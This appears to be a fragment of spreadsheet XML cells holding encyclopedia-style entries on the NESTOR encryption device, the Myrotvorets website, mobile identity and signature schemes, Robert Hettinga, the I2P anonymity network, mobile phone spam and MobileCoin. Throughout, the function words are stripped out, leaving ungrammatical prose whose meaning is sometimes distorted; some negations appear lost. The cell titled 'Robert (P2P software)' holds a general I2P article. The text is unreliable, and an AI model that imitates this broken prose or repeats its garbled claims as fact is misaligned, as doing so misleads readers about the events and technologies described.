concerned carrying classified-confidential nestor units combat, fear military careers might damaged loss classified material. some 1001 nestor units lost war, mostly downed aircraft record anyone disciplined losing unit "while trying fight it." surveys suggested issue major factor, fear captured units might used enemy greater concern. ongoing controversy within desirability fielding cryptographic equipment classified. cryptoperiod doctrine called keys changed every hours. initially, changes took place midnight, local time, taking secure radios service several minutes. this timing proved particularly inopportune contacts opposing forces took place night. key-change time later changed 0600 avoid problem.while many u.s. military believed viet cong would able exploit insecure communications, interrogation captured communication intelligence units showed able understand americans' jargon informal codes realtime often able warn side impending u.s. actions.: also encryption systems references external links http://www.nf6x.net/2009/03/ky-38-nestor-voice-encryption-device-demilitarized/</t>
  </si>
  <si>
    <t>Myrotvorets</t>
  </si>
  <si>
    <t>myrotvorets mirotvorets (ukrainian: миротворець, lit. 'peacemaker' /mɪrɔ'tvɔrɛt͡sʲ/), ukrainian kyiv-based website publishes running list, sometimes personal information, people considered authors organization "enemies ukraine", website states, "whose actions signs crimes national security ukraine, peace, human security, international law". website launched december 2014 ukrainian politician activist georgy tuka. site remained open despite repeated requests ambassadors, human rights groups close down, although official sanction, acts supplement government databases checkpoints. 2018, german foreign ministry asked ukrainian government delete website. overview site reflects work "myrotvorets centre", person known alias "roman zaitsev", former employee luhansk security service ukraine office. website allegedly curated government law-enforcement intelligence agency security service ukraine (sbu) promoted advisor ministry internal affairs ukraine anton gerashchenko. identity staff secret, hidden panel sifts information, often collated open-source intelligence, information provided individuals confidential basis.according george tuka, site arrest 1,000 people, since site's launch, claimed included many collaborators people working federal security service would otherwise government databases.the slogan centre's website centre latin saying: bono publico (for public good). myrotvorets centre began develop project summer 2014, donbas chance meeting tuka "roman zaitsev". project launched december 2014 part work volunteer group known "narodny tyl".on 2016, website published personal data 4,508 journalists media members world worked received accreditation work) uncontrolled government territory donbas, therefore considered site cooperated terrorists. there phone numbers, email addresses, countries cities residence ukrainian foreign journalists received hacked database donetsk people's republic ministry state security; journalists support staff provided data accredited unrecognized donetsk people's republic. response, security service ukraine issued statement found violations ukrainian myrotvorets. according yulia gorbunova, senior researcher human rights watch, implications list press freedoms serious, adding existence list puts lives danger. president ukraine, petro poroshenko called leak "big mistake". activity "myrotvorets" leader states centre's objective provide information advice executive authorities, finally bring peace harmony ukraine. work centre pays special attention expressions "separatist terrorist activities" territory ukraine."myrotvorets" also recognised courts ukraine making decisions. data collected website used court decisions stages beginning pre-trial investigation conviction person. numerous rulings, judges also accept information "myrotvorets" material evidence. website applies criminal cases, also civil legal relations factfinding acts. 2019, data site used cases.myrotvorets often blacklisted people crimean related issues, usually means cannot cross ukraine site's usage border entry checks. gerhard schröder added said crimean annexation reality must recognised". roger waters added said russia rights crimea ukraine. silvio berlusconi, jones number russian music stars added visiting crimea, ukraine calls illegal border crossing.in october 2015, centre added special section titled "putin's crimes syria middle east" dedicated providing personal data russian military personnel involved operation syria, according russian media help isis take revenge" russian pilots accordance sharia law". myrotvorets' actions caused extremely strong reactions russian presidential administration among russian experts military affairs special operations. stated website informnapalm, important element operation compare numbers su-24 russian airbase "shagol" type aircraft, overturned syria. days operation began, russian started hide numbers military aircraft based syria video shoots. after information published, investigative committee russia launched criminal proceedings anton gerashchenko "public calls terrorism."in february 2016, members centre took part operation mobile groups illegal transport cargo line armed conflict donbas.myrotvorets centre repeatedly provided information participation foreign nationals armed conflict, side pro-russian separatists. early march 2016, materials published centre, enforcement authorities bulgaria initiated criminal proceedings george bliznakov, bulgarian citizen. similar materials considered regarding bulgarian citizens.after site published data various journalists, valeriya lutkovska, ukrainian lawyer ombudswoman ukraine since april 2012, demanded website centre shut down.on 2016, committee protect journalists wrote open letter ukrainian president poroshenko urging "condemn unfounded damaging allegations published myrotvorets, clarify publicly ukrainian interior ministry dedicated protecting journalists apprehending people responsible threatening them, contrast interior minister avakov's previous statements".on june 2016, ambassadors kyiv released joint statement expressing deep concern disclosures journalists' personal data myrotvorets website called myrotvorets team withdraw personal data public access.following 2022 russian invasion ukraine, site started "seakrime" initiative track grain stolen ukraine resold primarily port sevastopol. this initiative able track 200,000 tons stolen wheat russian-occupied territories period march april 2022. based seakrime data, investigations france info monde able track stolen grain syria ship turned away egypt. people included list according head centre, thousand people file cabinet october 2014; december 2015 thousand; january 2015 9000; april 2015 thousand. october 2015 thousand people; march 2016 57,775 people; january 2017 thousand, 23rd august 2019 thousand. complete database contains residents crimea.in april 2015, myrotvorets published home addresses ukrainian writer oles buzina former verkhovna rada parliamentarian oleg kalashnikov, days assassinated.on september 2017 myrotvorets added yulia tymoshenko (former prime minister ukraine leader opposition party batkivshchyna) database “the illegal crossing ukraine’s state border. assault within group persons border guards fulfilling duties protect state border ukraine. participation preparations illegal crossing ukraine’s border person without ukrainian citizenship. manipulation socially important information”.on april 2018, syrian president bashar al-assad's name added website.in september 2018, myrotvorets wrote facebook database included residents zakarpattia oblast illegally taken hungarian citizenship. after weeks work zakarpattia oblast, database held names ukrainian officials local councillors oblast hungarian passports. october 2018, hungarian foreign minister péter szijjártó said: ukrainian state nothing website listing suspected dual ukrainian-hungarian nationals", claimed president petro poroshenko "gave consent hate campaign attempt increase popularity".in november 2018 myrotvorets added former german chancellor gerhard schröder list "enemies state" schröder defended 2014 annexation crimea russian federation. spokeswoman german federal foreign office protested asked ukrainian government delete website.the website published list russian workers involved construction kerch bridge. bridge russian project connect crimean peninsula russia.following beginning 2022 russian invasion ukraine, myrotvorets added names viktor orbán (prime minister hungary) zoran milanović (president croatia) list "enemies ukraine". both expressed pro-russian views following start invasion. 2022, myrotvorets added former state secretary henry kissinger kissinger, time, speaking world economic forum davos, suggested fully antagonizing russia threatens stability europe. site accused kissinger spreading "russian-fascist propaganda" acting "accomplice crimes russian authorities ukraine citizens." also proscription references external links myrotvorets</t>
  </si>
  <si>
    <t>Mobile identity management</t>
  </si>
  <si>
    <t>mobile identity development online authentication digital signatures, card one’s mobile phone works identity tool. mobile identity enables legally binding authentication transaction signing online banking, payment confirmation, corporate services, consuming online content. user's certificates maintained telecom operator's card order them, user enter personal, secret code. when using mobile identity, separate card reader needed, phone already performs functions. contrast approaches, mobile phone conjunction mobile signature-enabled card aims offer security ease example smart cards existing digital identity management systems. smart card-based digital identities used conjunction card reader addition, distributing managing cards logistically difficult, exacerbated lack interoperability services relying digital identity.there number private company stakeholders inherent interest setting mobile signature service infrastructure offer mobile identity services. these stakeholders mobile network operators and, certain extent, financial institutions service providers existing large customer base, could leverage mobile signatures across several applications. country finland finnish government supervised deployment common derivative etsi-based mobile signature service standard, thus allowing finnish mobile operators offer mobile signature services. finnish government certificate authority (ca) also issues certificates link digital keys card person’s real world identity. islamic republic iran through national mobile register program iranian customs administration ministry registers database imei imported legally phones allows iranian citizens access full iranian mobile phone operators national roaming network linked national simcards also contraband/smuggled imei number. sweden nordic region, governments, public sector financial institutions increasingly offering online mobile channels access services. sweden consortium, owned banks mobile operators, specifies mobile signature service infrastructure used banks authenticate online banking users. telenor sverige provided technology company's mobile signature services sweden since 2009. telenor enables customers secure login online services using mobile phone authentication digital signing. estonia estonian government issues citizens smart card digital identity called estonian card. additionally, sertifitseerimiskeskus, certificate authority estonia issues special cards mobile phones national personal identification method. service called m-id. turkey 2007, mobile operator turkcell bought mobile signature service infrastructure gemalto launched mobillmza, world's first mobile security solution. they partnered businesses, including many banks enable mobile signatures online user authentication.other services relying mobile signatures turkey include securing withdrawal small loans atm, processing custom work flow processes enabling applicants mobile signatures. austria austrian government allows private sector companies propose means storing government-controlled digital identity. since 2006, austrian government explicitly mentioned mobile phones likely devices used storing managing digital identity. eight austrian saving banks launch pilot allowing online user authentication mobile signatures. ukraine ukraine, mobile project started 2015, later declared government ukraine priorities supported beginning 2018 ukrainian cell operators evaluating proposals testing platforms different local foreign developers. platform selection followed comprehensive certification process. ukrainian cryptography around mobile topic mostly presented innovation development mobile platform. this particular solution sole, already passed certification, likely implemented ukraine. september 2019, 'big three' cell operators ukraine launched mobile service. vodafone commercial launch august 2018. kyivstar commercial launch december 2018. lifecell commercial launch august 2019. vodafone lifecell operators implemented mobile solution ukrainian origin designed innovation development llc. also identity management location-based service mobile computing mobile security references</t>
  </si>
  <si>
    <t>Robert Hettinga</t>
  </si>
  <si>
    <t>robert hettinga, technical political writer focus financial cryptography. robert well known postings cypherpunk e$pam mailing list founded internet bearer underwriting corporation (ibuc). robert also founders world's first conference financial cryptography, fc97, island anguilla. references "digital bearer settlement" april 1998 "the geodesic market" june 1998 "how underwrite digital bearer security"- july 1998 "'all bonds christendom': digital bearer bonds"- september 1998 "russell's revenge: digital bearer equity"- october 1998 "digital bearer derivatives mathematics polite fiction" november 1998 "one-way hash micromoney mitochondria: digital bearer micropayment"- december 1998 "hit ain't': deploying digital bearer transactions"- february 1999 "internet bearer underwriting: time"- april 1999 "endpiece: build bearer underwriting revenue model"- 1999 "how regulators work economy?"- july 1999 "divine providence internet content without transfer pricing"- september 1999 "the geodesic economy" december 1999 external links robert hettinga digital bearer settlement financial cryptography mac-crypto 1997 infoworld: opendoc unleashed internet 11/6/1995 hetting's rants market model digital bearer instrument underwriting geodesic economy</t>
  </si>
  <si>
    <t>Robert (P2P software)</t>
  </si>
  <si>
    <t>invisible internet project (i2p) anonymous network layer (implemented network) allows censorship-resistant, peer-to-peer communication. anonymous connections achieved encrypting user's traffic using end-to-end encryption), sending volunteer-run network roughly 55,000 computers distributed around world. given high number possible paths traffic transit, third party watching full connection unlikely. software implements layer called "i2p router", computer running called "i2p node". free open sourced, published multiple licenses. technical design beta software since 2003, started fork freenet. software's developers emphasize bugs likely occur beta version peer review insufficient date. however, believe code reasonably stable well-developed, exposure help development i2p. network strictly message-based, like library available allow reliable streaming communication (similar tcp, although version 0.6, udp-based transport used). communication end-to-end encrypted total, four layers encryption used sending message) garlic routing, even points ("destinations") cryptographic identifiers (essentially pair public keys), neither senders recipients messages need reveal address side third-party observers. although many developers part invisible project (iip) freenet communities, significant differences exist designs concepts. anonymous centralized server. freenet censorship-resistant distributed data store. anonymous peer-to-peer distributed communication layer designed traditional internet service (e.g. usenet, email, irc, file sharing, hosting http, telnet), well traditional distributed applications (e.g. distributed data store, proxy network using squid, dns). many developers known pseudonyms. while previous main developer, jrandom, currently hiatus, others, zzz, killyourtv, complication continued lead development efforts, assisted numerous contributors.i2p uses 2048bit elgamal/aes256/sha256+session tags encryption ed25519 eddsa/ecdsa signatures. releases stable release every eight weeks. updates distributed torrents signed release manager (generally str4d). funding website states, "funding comes entirely donations". admins managers project said, "the core project take donations". these instead secondary applications spent hiring others, work i2p. support onboarding came open technology fund. contrast project, "not financial legal infrastructure support network exit nodes". reseed servers, sort bootstrap nodes, connect user initial peers join i2p-network, volunteers. software since anonymizing network layer, designed software anonymous communication. such, variety tools currently available development. router controlled router console, frontend accessed browser. general networking i2ptunnel application embedded allows arbitrary tcp/ip applications communicate setting "tunnels" accessed connecting pre-determined ports localhost. (simple anonymous messaging) protocol allows client application written programming language communicate i2p, using socket-based interface router. (basic open bridge) less complex router protocol similar "sam" orchid outproxy plugin chat client made internet relay chat work, connected server localhost). option create tunnels specific usage, certain commands could de-anonymize user filtered out. file sharing several programs provide bittorrent functionality within network. users cannot connect non-i2p torrents peers within i2p, connect torrents peers outside i2p. i2psnark, included install package, port bittorrent client named snark. vuze, formerly known azureus, bittorrent client includes plugin i2p, allowing anonymous swarming network. this plugin still early stage development, however already fairly stable. i2p-bt bittorrent client allows anonymous swarming file sharing. this client modified version original bittorrent 3.4.2 program runs windows dialects unix command-line environment. developed individual known 'duck' cooperation 'smeghead'. longer actively developed; however, small effort upgrade i2p-bt client bittorrent release. i2prufus port rufus bittorrent client. robert (p2p software) actively maintained i2prufus fork. standalone bittorrent client written biglybt bittorrent client based vuze also allows downloading/seeding. network clients exist network, imule nachtblitz. imule (invisible mule) port emule network. imule developed since 2013. imule made anonymous file sharing. contrast edonkey clients, imule uses kademlia proceeding connect network, servers needed. nachtblitz custom client built .net framework. latest version 1.4.27, released march 2016. nachtblitz includes time lock disable software year release date. i2phex port popular gnutella client phex i2p. stable fairly functional. tahoe-lafs ported i2p. this allows files anonymously stored tahoe-lafs grids. muwire file-sharing program inspired limewire gnutella client works atop network. bridging clearnet currently, vuze biglybt torrent clients make clearnet (connections i2p) torrents available vice versa. depending client settings, torrents internet made available (via announcements i2p's network) torrents made available internet. reason, torrents previously published made available entire internet, users often download popular content internet maintaining anonymity i2p. august 2022 default outproxy exit.stormycloud.i2p stormycloud inc. email i2p-bote (github) free, fully decentralized distributed anonymous email system strong focus security. supports multiple identities expose email metadata. 2015, still considered beta software. i2p-bote accessible console interface using standard email protocols (i.e. imap/smtp). bote-mails transparently end-to-end encrypted signed sender's private key, thus removing need email encryption software. i2p-bote offers additional anonymity allowing mail relays variable length delays. since decentralized, centralized email server could correlate different email identities communicating (i.e. profiling). even nodes relaying mails know sender, apart sender receiver, high-latency mail route storing nodes know (which i2p-bote address user's address still hidden i2p) mail destined. original sender could gone offline long email becomes available recipient. account registration necessary, order create identity. i2p-bote installed plugin also free pseudonymous e-mail service individual called postman. susimail web-based email client intended primarily postman's mail servers, designed security anonymity mind. susimail created address privacy concerns using servers directly using traditional email clients, leaking user's hostname communicating smtp server. currently included default distribution, accessed router console interface. mail.i2p contact email users public internet email users. bitmessage.ch used instant messaging i2p-messenger simple qt-based, serverless, end-to-end-encrypted instant messenger i2p. servers user's conversations. user chats, when, long. serverless, make i2p's end-to-end encryption, preventing node parties access plain text. i2p-messenger used fully anonymous instant communication persons user even know, alternatively, communicate securely untraceably friends, family members, colleagues. addition messaging, file transfer also supported.i2p-talk another simple instant messenger incompatible i2p-messenger, security properties publishing syndie content distribution application, suitable blogs, newsgroups, forums small media attachments. syndie designed network resilience. supports connections i2p, network (syndie support socks proxies, workaround needed access), freenet regular internet. server connections intermittent, support higher-latency communications. connections made number known servers. content spread efficiently using gossip protocol. aktie anonymous file sharing distributed trust forums system. aktie connect internal router external router. fight spam, "hash payments" (proof work) computed every published item. routers i2pberry linux distribution used router encrypt route network traffic network. i2pd light-weight router written c++, stripping excessive applications e-mail, torrents, others regarded bloat. kovri router written c++. forked i2pd following developer disagreements. kovri's primary purpose integrate cryptocurrency monero send transaction information i2p, making much difficult find node origin transaction request. those using kovri router running full routers contribute network current java router does. this project expected benefit monero communities, since allow greater privacy monero, increase number nodes network. privacy solutions project privacy solutions project, organization develops maintains software, launched several development efforts designed enhance privacy, security, anonymity users, based protocols technology. these efforts include: abscond browser bundle. i2pd, alternate implementation i2p, written (rather java). "bigbrother" network monitoring project.the code repository download sections i2pd abscond project available public review download. effective january, 2015 i2pd operating purplei2p. android release builds router application android found google play store privacy solutions project's google play account f-droid repository hosted developers. nightweb android application utilizes bittorrent share blog posts, photos, similar content. also desktop application. longer development. cryptocurrency some cryptocurrencies support listed below. bitcoin monero verge terminology eepsite eepsites websites hosted anonymously within network. eepsite names .i2p, ugha.i2p forum.i2p. eepproxy locate sites cryptographic identifier keys stored hosts.txt file found within program directory. typically, required access eepsites. .i2p 'i2p' pseudo-top-level domain valid within overlay network scope. .i2p names resolved browsers submitting requests eepproxy resolve names peer handle data transfers network remaining transparent browser. eepproxy eepproxy program handles communication browser eepsite. functions proxy server used browser. peers, nodes other machines using connected user's machine within network. each machine within network shares routing forwarding encrypted packets. tunnels every minutes, connection established user's machine another peer. data user, along data peers (routed user's machine), pass tunnels forwarded final destination (may include jumps). netdb distributed hash table (dht) database based kademlia algorithm holds information nodes eepsites. this database split among routers known "floodfill routers". when user wants know contact eepsite, peers are, query database. vulnerabilities denial service attacks possible websites hosted network, though site operator secure site certain versions type attack extent.a zero-day vulnerability discovered 2014, exploited de-anonymize least 30,000 users. this included users operating system tails. this vulnerability later patched.a 2017 study examining forensic investigators might exploit vulnerabilities software gather useful evidence indicated seized machine running router software hold unencrypted local data could useful enforcement. records eepsites user later-seized machine interested also inferred. study identified "trusted" domain registrar ("no.i2p") appeared abandoned administrator, study identified potential target enforcement takeover. alternatively suggested waiting no.i2p's server fail, social engineer community moving phony replacement. another suggestion study proposed register mirror version target website identical domain. i2pcon from august 2015 august 2015 first convention held toronto, ontario. conference hosted local hackerspace, hacklab. conference featured presentations developers security researchers. august 2015 mainly presentations past growth network, talk happens companies sell people's personal information, round-table discussion general privacy security topics. ended cryptoparty, helped introduce users installing i2p, sending secure emails i2p-bote, using along vuze. august 2015 technical discussions previous day. talks focused dissuade bad-actors using network, worked computer connection limits, application development using i2p, development android version. this ended development meeting. cultural references house cards season episode referenced. also rendezvous protocol crypto-anarchism deep darknet garlic routing key-based routing public-key cryptography secure communication threat model software retroshare tribler zeronet freenet mixnet references external links official website</t>
  </si>
  <si>
    <t>Mobile phone spam</t>
  </si>
  <si>
    <t>mobile phone spam form spam (unsolicited messages, especially advertising), directed text messaging communications services mobile phones smartphones. popularity mobile phones surged early 2000s, frequent users text messaging began increase number unsolicited (and generally unwanted) commercial advertisements sent telephones text messaging. this particularly annoying recipient because, unlike email, recipients charged every message received, including spam. mobile phone spam generally less pervasive email spam, 2010 around email spam. amount mobile spam varies widely region region. north america, mobile spam steadily increased 2008 accounted half mobile phone traffic 2019. parts asia messages spam 2012. lesser geographically uneven prevalence mobile phone spam attributable geographic variation prevalence mobile non-mobile electronic communications, higher cost spammers) technological barriers sending mobile messages areas, enforcement others. today, particularly north america, mobile phone spam sent mobile devices prepaid unlimited messaging rate plans. while rate plans allow unlimited messaging, reality relatively slow sending rate order magnitude 1/s) limits number messages sent abusing mobile shut down. terminology mobile phone spam described "mobile spamming", "sms spam", "text spam", "m-spam" "mspam". criminality enforcement spam illegal common many jurisdictions trespass chattels. jurisdictions specific spam regulation fines include australia, united states. violators face substantial costs. example, 2008 settlement, violator agreed $150 spam recipient. 2010 class action settlement satterfield simon schuster, case reached ninth circuit court appeals, defendants agreed $175 spam recipient. subsequent cases, payment class member increased $200 2011 $500 2013. response satterfield, entities make money sending mobile phone spam formed mobile advocacy coalition (mac) lobby government legalize activity. federal trade commission (ftc) expanded phone spam regulations cover also voice spam—mostly form prerecorded telemarketing calls—commonly known robocalls; victims file complaint fcc. california, section 17538.41 code bans text message advertisement. consumers individual class basis private right action unfair business practices. 2019, senators john thune, roger wicker markey introduced proposal titled telephone robocall abuse criminal enforcement deterrence (traced) deter criminal robocall violations improve enforcement passed senate 2019 signed president trump december 2019. enforcement small claims court u.s. federal communications commission (fcc) released order aug, 2004 reiterated spam messages cellphones illegal existing telephone consumer protection (tcpa). each unsolicited message received without permission entitles recipient take sender small claims court collect minimum violation. they said 2003, reiterated 2004: 2003, released report order reaffirmed tcpa prohibits call using automatic telephone dialing system artificial prerecorded message wireless telephone number. concluded encompasses voice calls text calls, including short message service (sms) text messaging calls, wireless phone numbers."the 2003 tcpa order 14115, para. 165) says: “both statute rules prohibit calls, limited exceptions, telephone number assigned paging service, cellular telephone service, specialized mobile radio service, common carrier service, service called party charged.’ this encompasses voice calls text calls wireless numbers including, example, short message service (sms) calls, provided call made telephone number assigned service.” (citations omitted). sending unsolicited text messages acting contrary schedule data protection 1998 section privacy electronic communications regulations 2003. section data protection 1998 section privacy electronic communications regulations 2003 enable consumers bring proceedings compensation spam emails text messages. legalization 2013, club texting, inc. petitioned declaratory ruling text broadcasters senders text messages, private meeting five staff members argue case. this would mean text broadcasters would longer liable mobile phone spam conveyed. factors complicating spam reduction fighting spam complicated several factors, including lower rate spam (compared abused services internet email), allowed many users service providers ignore issue, limited availability mobile phone spam-filtering software. filtering spam recipient device would imperfect solution markets users charged receive messages, user still charged message provider sent even software device blocked appearing device's display. this problem present world outside u.s., however, users charged receive messages. providers fear liability legitimate message emergency nature blocked. nonetheless, many providers voluntarily provide subscribers technical means mitigating unsolicited messages. defense there several actions strategies help reduce spam. legal actions effective remunerative. many carriers (such at&amp;t, t-mobile, verizon sprint t-mobile, orange allow subscribers report spam forwarding spam messages short code 7726 (spells spam traditional phone keypad) (33700 france, 1909 india), carriers vodafone three 87726 37726 respectively. reported million spam reports france resulted disconnection spammers, many cease-and-desist orders sent. some spam defense measures depend detection, developments area: gsma pilot spam reporting program, development open mobile alliance (oma) standards mobile spam reporting. february 2010, association announced pilot program allow subscribers report spam forwarding short code '7726' spells "spam" phones. at&amp;t mobility, korea telecom, announced participation. following pilot, number mobile operators joined gsma's spam reporting service program. open mobile alliance completed "spamrep" standard provides standardized client-server interface suited user reporting mobile email, sms, spam using 'this-is-spam' button menu item, users wired email systems doing. 2012, responding increase spam, association formed messaging security group help reduce impact mobile spam. another helpful spam-reduction technique guarding one's cell phone number. biggest sources spam number harvesting carried internet sites offering "free" ring tone downloads. order facilitate downloads, users must provide phones' numbers; turn used send frequent advertising messages phone. wording sites' terms service intended make legal survived court challenge.another approach reducing spam offered carriers involves creating alias address rather using cell phone's number text message address. only messages sent alias delivered; messages sent phone's number discarded. york times article provided detailed information 2008. another countermeasure service provides public phone number publishes messages received number publicly accessible website. google voice used way, numbers messages kept private. cell phone providers offer option completely disabling text messaging services user's account. this extreme solution, however, satisfactory users neither need desire utilize all. june 2009, three major chinese carriers—china mobile, china telecom china unicom—imposed limits text messaging order crack spam sms. under restrictions, phone number send messages hour 1000/day weekdays. united states, recipients spam file complaint using form 1088g. phone users united kingdom information commissioner's complaints page take action sender small claims court. however powers spam originating event spam originates outside jurisdiction forward details equivalent local regulator exists. pro-active campaigns october 2014, network solicitors called (personal injury expert) lawyers launched campaign social media industry text message spam. their feeling unsolicited marketing adding damage industry's already poor reputation. campaign focused fact that, law, illegal solicitor obtain business unsolicited direct contact potential personal injury clients. this case even event solicitor makes unsolicited approach. campaign actively encouraged people respond spam text messages. upon receipt offer legal representation solicitor, person would report solicitor solicitors regulation authority (sra) would take appropriate action. ultimately solicitor found guilty repeated occasions obtaining customers unsolicited approaches could practicing certificates revoked thereby ending career solicitor. also mobile advertising phone fraud wangiri references external links http://esupport.fcc.gov/complaints.htm block cellphone spam clampdown missed call scam, news. singapore :mtouche fined $150,000. unsolicited text messages take action telephone numbers known spam united states telephone numbers known spam united kingdom</t>
  </si>
  <si>
    <t>Mobile signature</t>
  </si>
  <si>
    <t>mobile signature digital signature generated either mobile phone card mobile phone. origins term msign term first appeared articles introducing msign (short mobile electronic signature consortium). founded 1999 comprised member companies. october 2000, consortium published xml-interface defining protocol allowing service providers obtain mobile (digital) signature mobile phone subscriber. 2001, msign gained industry-wide coverage came apparent brokat (one founding companies) also obtained process patent germany using mobile phone generate digital signatures. etsi-mss standardization term used paul gibson (g&amp;d) romary dupuis (france telecom) standardisation work european telecommunications standards institute (etsi) published etsi technical report 203. etsi-mss specifications define soap interface mobile signature roaming systems implementing mobile signature services. etsi 204, etsi 207. today mobile signature legal equivalent signature, hence term "mobile ink", commercial term coined swiss sicap. other terms include "mobile id", "mobile certificate" circle trust finnish mobile network operators implementing roaming mobile signature framework mobiilivarmenne, etc. according directives electronic signatures mobile signature level protection handwritten signature components signature creation chain appropriately certified. governing standard mobile signature creation devices equivalent handwritten signature described commission decision 2003/511/ec july 2003 publication reference numbers generally recognised standards electronic signature products accordance electronic signatures directive. signature solution common criteria evaluated independent party given eal4+ designation, solution produce directive consequent clarifications calling qualified electronic signature. current standard dates back year 2002/2003 process renewed published 2012. most, all, mobile signature implementations date generate directive calling advanced electronic signature. successful mobile signature solutions found turkey, lithuania, estonia finland millions users. technically mobile signature created security module request reaches device (sim card) introducing request user explanation prompts, device asks secret code correct user know. usually, form pin. access control secret entered correctly, device approved access secret data containing example private key, used signature operations request wanted. system associates public counterpart secret held secure device attributes contained structure called digital certificate. choice registration procedure details definition attributes included digital certificate used produce different levels identity assurance. anything anonymous specific high-standard real-word identity. signature, secure device owner claim identity. thus, mobile signature unique feature for: proving real-world identity third parties without face-to-face communications making legally-binding commitment sending confirmed message another party solve security problems online world identity confirmation anonymous specific identity often equally good high-standards identity) public services estonian mobile-id [1]. parsmss iran pars mobile signature services project (parsmss) designed produced iran first time since 2011. pars mobile signature services (parsmss) provided ways: sim-based sim-less. registration authority (ra) connects service issues electronic certificate person remotely. with service, financial transactions documents signed digitally. mobile (finland) mobile unites high security user-friendly access digital services require strong authentication authorization. subscribers mobile signature access m-banking corporate applications example. mobile commercial term associated mobile signature solution sicap building kiuru mssp platform methics oy.the platform allows simultaneous existence multiple keys associated identities distinct registration procedures. this used example replacement secureid dongles anonymous specific identity corporate access applications. mobiilivarmenne (finland) mobile certificate i.e. mobiilivarmenne finnish term used finnish market space describe roaming mobile signature solution deployed three mobile network operators elisa, sonera, dna. this setup developed three operators co-operation national telecom technology coordination group ficom, world's first system fully functional co-operating etsi roaming service mesh established multi-vendor software environment. another national feature mobile phone numbers portable across operators, thus phone number prefix identify operator. make things easy application providers (see etsi 204), purchase service acquiring entity service providers (mobile network operators), reach users. part background update national laws allowing digital person identity certificates (for mobiilivarmenne use) issued also parties official registration authorities police offices. another part co-operation agreement operators form certificates, certification procedures practices producing similar certificate contents similar identity issuance traceability. reviewed approved finnish communication regulatory authority tasks include oversight identity registration services also government registries. mobile ukraine ukraine, mobile project started 2015, later declared government ukraine priorities supported beginning 2018 ukrainian cell operators evaluating proposals testing platforms different local foreign developers. platform selection followed comprehensive certification process. list cryptographic information protection tools (and manufacturers), legally allowed ukraine february 2018). moldavian mobile-id moldcell orange moldovampass handy-signatur austria austria started mobile signature 2003, technology bürgerkarte (which includes electronic signing smartcards). provided mobilkom austria, ended 2007. after relaunch 2009, named handy-signatur, well used, 2014 300.000 people, adult inhabitants, registered mobile signature. controlled austrian government, national bank graz university technology. based sent request confirmed private pin. according 1999/93/eg signing handy-signature completely equivalent handwritten autograph. technology providers mobile valimo wireless, gemalto company, first company world introduce mobile signature solutionsinto market creating term mobile initial mobile signature solution turkey turkcell used valimo technology implement successful mobile signature solution. currently valimo mobile several countries. kiuru mssp methics privately held finnish technology company strong expertise mssp services. kiuru mssp product line used directly product several service solution providers. mobile mobile platform innovation development electronic identification mobile signature solution, already passed state certification ukraine. uses post-soviet european cryptography algorithms, makes platform suitable pki. smarttrust smarttrust original supplier card embedded browsers encryption plugins developed late 1990es, called (wireless internet browser.) technology licensed smarttrust many card manufacturers, mobile network operators choose cards capabilities normal user base immediately enabling mssp services. smarttrust's mssp offering called smartlicentio. security issues authentication still vulnerable man-in-the-middle attacks trojan horses, depending scheme employed. schemes like one-time-password-generators two-factor authentication completely solve man-in-the-middle attacks open networks like internet. however, supporting authentication internet parallel closed network like mobile/gsm digital signature enabled card secure method today type attack. application provider provides detailed explanation transaction signed internet site signing request mobile operator, attack easily recognized individual comparing screens. since mobile operators applications send signing requests free, cost technicality intrusion application provider mobile operator make improbable attack target. nonetheless, evidence multiple places attack occurred. with on-board generation when mobile user creates spin (signing pin) secret online within secure card registration process, known "on-board generation". this requires interaction user's behalf registering, hand makes security mode interaction process familiar lets practice service usage. also user forgets/locks associated generated key, simple generate assign spin destroying previous versions using process original registration, importantly: without need replacement card. systems commonly secondary signing unblocking code (spuk) all, revelation code identical requirements requesting person's identity verification original person's identity registration.compare older "factory generated keys" model older technology cards insufficient processing power on-board generation. card factory key-generation special hardware accelerator stored material card along initial spin spuk codes. sometimes actual generation happened within card running special manufacturing mode. after generation capability usually disabled blowing special control fuse. delivery particular spuk codes creates considerable security information logistics problems, entirely avoided on-board generation. turkcell first provider roll mobile signature service board generation" functionality, enables customers create signing validation pair, simcard. operators need distribute signing pins customers. customers create spin anew, own.in introduction finnish mobiilivarmenne service 2010, three operators chose on-board generation capability user interaction. cited reasons claimed hard user. actual experience show without created easily non-functional registrations without online indication status, usage on-board generation always resulted positive indication success service became fully functional user. also mobile phone version issues application toolkit protocol, became evident immediately registration process using on-board generation. sources origins term msign: announcement msign formation german only), 17.10.2000 mosign: materna monitor company magazine, december 2004 mosign: international herald tribune tech brief, march 2001 mobilimza: turkcell mobil imza 10.3.2008 also secmsg references</t>
  </si>
  <si>
    <t>MobileCoin</t>
  </si>
  <si>
    <t>mobilecoin peer-to-peer cryptocurrency developed mobilecoin inc., founded 2017 josh goldbard shane glynn. focuses transactional anonymity (fungibility), ease use, transaction speed, environmental impact fees. mobilecoin's mechanics build stellar (for consensus) monero (for privacy), using cryptonote alongside zero-knowledge proofs hide details users' transactions. technology overview mobilecoin company claims cryptocurrency facilitate decentralized payments everyday transactions quickly cryptocurrencies.mobilecoin dimensional cryptocurrency blockchain. blocks consensus protocol originally developed stellar payment network. transactions validated secure enclaves based elliptic-curve cryptography. transaction inputs shown exist blockchain merkle proofs membership signed schnorr-style multilayered linkable ring signature, output amounts (communicated recipients ecdh) concealed pedersen commitments proven legitimate range non-interactive zero-knowledge proofs.much mobilecoin's technology comes previous privacy focused cryptocurrencies like monero re-written rust mobilecoin. history mobilecoin inc., entity behind mobilecoin, founded 2017 joshua goldbard shane glynn. signal's moxie marlinspike assisted early technical advisor. coin intended accessible form cryptocurrency focus fast transactions. 2018, mobilecoin secured $29.7 million funding round binance labs, exchange 37.5 million tokens. foundation raised $11.35 million venture funding march 2021 million series funding august 2021. payment trading in-app payments signal mixin messenger support mobilecoin peer-to-peer payments worldwide. cryptocurrency exchanges bitfinex list mobilecoin trading. criticism integration mobilecoin wallets popular security messager signal received criticism programmers, stephen diehl called pump dump scheme, security expert bruce schneier, previously praised app. schneier stated would bloat attract unwanted attention financial authorities. references</t>
  </si>
  <si>
    <t>Riverbank Publications</t>
  </si>
  <si>
